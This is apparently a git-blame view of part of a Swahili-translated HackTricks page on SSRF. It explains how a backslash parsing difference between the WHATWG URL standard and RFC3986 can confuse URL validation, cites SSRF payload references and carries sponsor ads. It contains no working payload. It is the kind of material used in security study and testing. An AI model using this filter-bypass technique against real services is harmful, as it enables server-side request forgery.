Translated to Swahili 2024-02-11 02:13:58 +00:00			Mbinu ya mshale wa nyuma inatumia tofauti kati ya [Standard ya URL ya WHATWG](https://url.spec.whatwg.org/#url-parsing) na [RFC3986](https://datatracker.ietf.org/doc/html/rfc3986#appendix-B). Wakati RFC3986 ni mfumo wa jumla wa URI, WHATWG ni maalum kwa URL za wavuti na imechukuliwa na vivinjari vya kisasa. Tofauti muhimu iko katika kutambuliwa kwa kiwango cha WHATWG cha mshale wa nyuma (`\`) kama sawa na mshale wa mbele (`/`), ambayo inaathiri jinsi URL zinavyopangiliwa, hasa kwa kuashiria mpito kutoka jina la mwenyeji kwenda kwenye njia katika URL.
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00
a 2024-02-06 03:10:27 +00:00			`![https://bugs.xdavidhu.me/assets/posts/2021-12-30-fixing-the-unfixable-story-of-a-google-cloud-ssrf/spec_difference.jpg](https://bugs.xdavidhu.me/assets/posts/2021-12-30-fixing-the-unfixable-story-of-a-google-cloud-ssrf/spec\_difference.jpg)`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`### Utata Mwingine`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00
a 2024-02-06 03:10:27 +00:00			`![https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/](<../../.gitbook/assets/image (629).png>)`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`picha kutoka [https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/](https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
intruder 2023-09-02 23:48:41 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`## Marejeo`
a 2024-02-06 03:10:27 +00:00			`* [https://as745591.medium.com/albussec-penetration-list-08-server-side-request-forgery-ssrf-sample-90267f095d25](https://as745591.medium.com/albussec-penetration-list-08-server-side-request-forgery-ssrf-sample-90267f095d25)`
			`* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/README.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/README.md)`

intruder 2023-09-02 23:51:32 +00:00			`<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>`
intruder 2023-09-02 23:48:41 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`Tafuta udhaifu unaofaa zaidi ili uweze kuyatatua haraka. Intruder inafuatilia eneo lako la shambulio, inatekeleza uchunguzi wa vitisho wa kujitokeza, inapata masuala katika mfumo wako wa teknolojia mzima, kutoka kwa API hadi programu za wavuti na mifumo ya wingu. [Jaribu bure](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) leo.`
intruder 2023-09-02 23:48:41 +00:00
			`{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}`


Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00			`<details>`

Translated to Swahili 2024-02-11 02:13:58 +00:00			`<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`Njia nyingine za kusaidia HackTricks:`
arte 2024-01-01 17:15:42 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`* Ikiwa unataka kuona kampuni yako ikitangazwa kwenye HackTricks au kupakua HackTricks kwa muundo wa PDF Angalia [MPANGO WA KUJIUNGA](https://github.com/sponsors/carlospolop)!`
			`* Pata [swag rasmi wa PEASS & HackTricks](https://peass.creator-spring.com)`
			`* Gundua [The PEASS Family](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [NFTs](https://opensea.io/collection/the-peass-family) za kipekee`
			`* Jiunge na 💬 [Kikundi cha Discord](https://discord.gg/hRep4RUj7f) au kikundi cha [telegram](https://t.me/peass) au tufuate kwenye Twitter 🐦 [@carlospolopm](https://twitter.com/hacktricks_live).`
			`* Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa [HackTricks](https://github.com/carlospolop/hacktricks) na [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`